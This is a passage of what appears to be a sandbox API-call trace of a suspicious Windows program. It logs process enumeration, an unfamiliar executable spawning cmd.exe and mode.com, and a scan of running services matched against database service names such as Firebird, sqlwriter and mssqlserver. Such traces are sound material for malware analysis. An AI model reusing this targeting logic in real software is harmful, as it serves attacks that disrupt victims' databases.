lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0297.827] lstrlenW (lpString="winlogon.exe") returned 12 [0297.827] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0297.828] lstrlenW (lpString="services.exe") returned 12 [0297.828] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0297.828] lstrlenW (lpString="lsass.exe") returned 9 [0297.828] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0297.829] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0297.829] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0297.829] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0297.829] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.830] lstrlenW (lpString="svchost.exe") returned 11 [0297.830] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.831] lstrlenW (lpString="svchost.exe") returned 11 [0297.831] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0297.831] lstrlenW (lpString="dwm.exe") returned 7 [0297.831] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.832] lstrlenW (lpString="svchost.exe") returned 11 [0297.832] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.833] lstrlenW (lpString="svchost.exe") returned 11 [0297.833] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.833] lstrlenW (lpString="svchost.exe") returned 11 [0297.833] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x16c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.834] lstrlenW (lpString="svchost.exe") returned 11 [0297.834] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x25, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.835] lstrlenW (lpString="svchost.exe") returned 11 [0297.835] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x490, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.835] lstrlenW (lpString="svchost.exe") returned 11 [0297.835] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x52c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.836] lstrlenW (lpString="svchost.exe") returned 11 [0297.836] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x584, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.836] lstrlenW (lpString="svchost.exe") returned 11 [0297.836] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.837] lstrlenW (lpString="svchost.exe") returned 11 [0297.837] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.838] lstrlenW (lpString="svchost.exe") returned 11 [0297.838] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0297.838] lstrlenW (lpString="spoolsv.exe") returned 11 [0297.839] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.839] lstrlenW (lpString="svchost.exe") returned 11 [0297.839] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0297.841] lstrlenW (lpString="audiodg.exe") returned 11 [0297.841] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0297.841] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0297.841] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0297.842] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0297.842] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0297.843] lstrlenW (lpString="Memory Compression") returned 18 [0297.843] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0297.843] lstrlenW (lpString="sihost.exe") returned 10 [0297.843] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0297.844] lstrlenW (lpString="svchost.exe") returned 11 [0297.844] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x938, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0298.287] lstrlenW (lpString="taskhostw.exe") returned 13 [0298.287] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x44, th32ParentProcessID=0xa10, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0298.292] lstrlenW (lpString="explorer.exe") returned 12 [0298.334] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0298.355] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0298.355] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0298.356] lstrlenW (lpString="SearchUI.exe") returned 12 [0298.356] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0298.357] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0298.357] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0298.357] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0298.358] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0xa24, pcPriClassBase=8, dwFlags=0x0, szExeFile="wdgmug.exe")) returned 1 [0298.358] lstrlenW (lpString="wdgmug.exe") returned 10 [0298.358] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xdd0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0298.359] lstrlenW (lpString="cmd.exe") returned 7 [0298.359] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0298.360] lstrlenW (lpString="conhost.exe") returned 11 [0298.360] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 1 [0298.361] lstrlenW (lpString="mode.com") returned 8 [0298.361] Process32NextW (in: hSnapshot=0x4c0, lppe=0x248fd2c | out: lppe=0x248fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xddc, pcPriClassBase=8, dwFlags=0x0, szExeFile="mode.com")) returned 0 [0298.362] CloseHandle (hObject=0x4c0) returned 1 [0298.362] Sleep (dwMilliseconds=0x1f4) [0299.391] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x401a2b0 [0299.391] EnumServicesStatusExW (in: hSCManager=0x401a2b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 0 [0299.392] GetLastError () returned 0xea [0299.392] RtlAllocateHeap (HeapHandle=0x470000, Flags=0x0, Size=0x1bc4) returned 0x4137f20 [0299.392] EnumServicesStatusExW (in: hSCManager=0x401a2b0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4137f20, cbBufSize=0x1bc4, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4137f20, pcbBytesNeeded=0x248ff3c, lpServicesReturned=0x248ff54, lpResumeHandle=0x0) returned 1 [0299.393] CloseServiceHandle (hSCObject=0x401a2b0) returned 1 [0299.393] lstrlenW (lpString="AppXSvc") returned 7 [0299.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0299.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0299.393] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0299.393] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0299.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0299.393] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0299.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0299.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0299.393] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0299.393] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0299.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0299.393] lstrlenW (lpString="Audiosrv") returned 8 [0299.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0299.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0299.393] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0299.393] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0299.393] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0299.393] lstrlenW (lpString="BFE") returned 3 [0299.393] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0299.393] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0299.394] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0299.394] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0299.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0299.394] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0299.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0299.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0299.394] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0299.394] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0299.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0299.394] lstrlenW (lpString="CDPSvc") returned 6 [0299.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0299.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0299.394] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0299.394] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0299.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0299.394] lstrlenW (lpString="ClickToRunSvc") returned 13 [0299.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0299.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0299.394] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0299.394] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0299.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0299.394] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0299.394] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0299.394] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0299.394] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0299.394] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0299.394] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0299.395] lstrlenW (lpString="CryptSvc") returned 8 [0299.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0299.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0299.395] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0299.395] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0299.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0299.395] lstrlenW (lpString="DcomLaunch") returned 10 [0299.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0299.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0299.395] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0299.395] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0299.395] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0299.395] lstrlenW (lpString="DeviceAssociationService") returned 24 [0299.395] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0299.395] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0299.396] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0299.396] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0299.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0299.396] lstrlenW (lpString="Dhcp") returned 4 [0299.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0299.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0299.396] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0299.396] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0299.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0299.396] lstrlenW (lpString="Dnscache") returned 8 [0299.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0299.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0299.396] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0299.396] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0299.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0299.396] lstrlenW (lpString="DPS") returned 3 [0299.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0299.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0299.396] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0299.396] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0299.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0299.396] lstrlenW (lpString="DusmSvc") returned 7 [0299.396] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0299.396] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0299.396] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0299.396] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0299.396] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0299.396] lstrlenW (lpString="EventLog") returned 8 [0299.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0299.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0299.397] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0299.397] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0299.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0299.397] lstrlenW (lpString="EventSystem") returned 11 [0299.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0299.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0299.397] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0299.397] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0299.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0299.397] lstrlenW (lpString="FontCache") returned 9 [0299.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0299.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0299.397] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0299.397] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0299.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0299.397] lstrlenW (lpString="gpsvc") returned 5 [0299.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0299.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0299.397] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0299.397] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0299.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0299.397] lstrlenW (lpString="iphlpsvc") returned 8 [0299.397] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0299.397] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0299.397] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0299.397] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0299.397] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0299.398] lstrlenW (lpString="KeyIso") returned 6 [0299.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0299.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0299.398] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0299.398] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0299.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0299.398] lstrlenW (lpString="LanmanServer") returned 12 [0299.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0299.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0299.398] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0299.398] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0299.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0299.398] lstrlenW (lpString="LanmanWorkstation") returned 17 [0299.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0299.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0299.398] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0299.398] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0299.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0299.398] lstrlenW (lpString="lfsvc") returned 5 [0299.398] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0299.398] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0299.398] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0299.398] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0299.398] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0299.398] lstrlenW (lpString="lmhosts") returned 7 [0299.398] lstrcmpiW 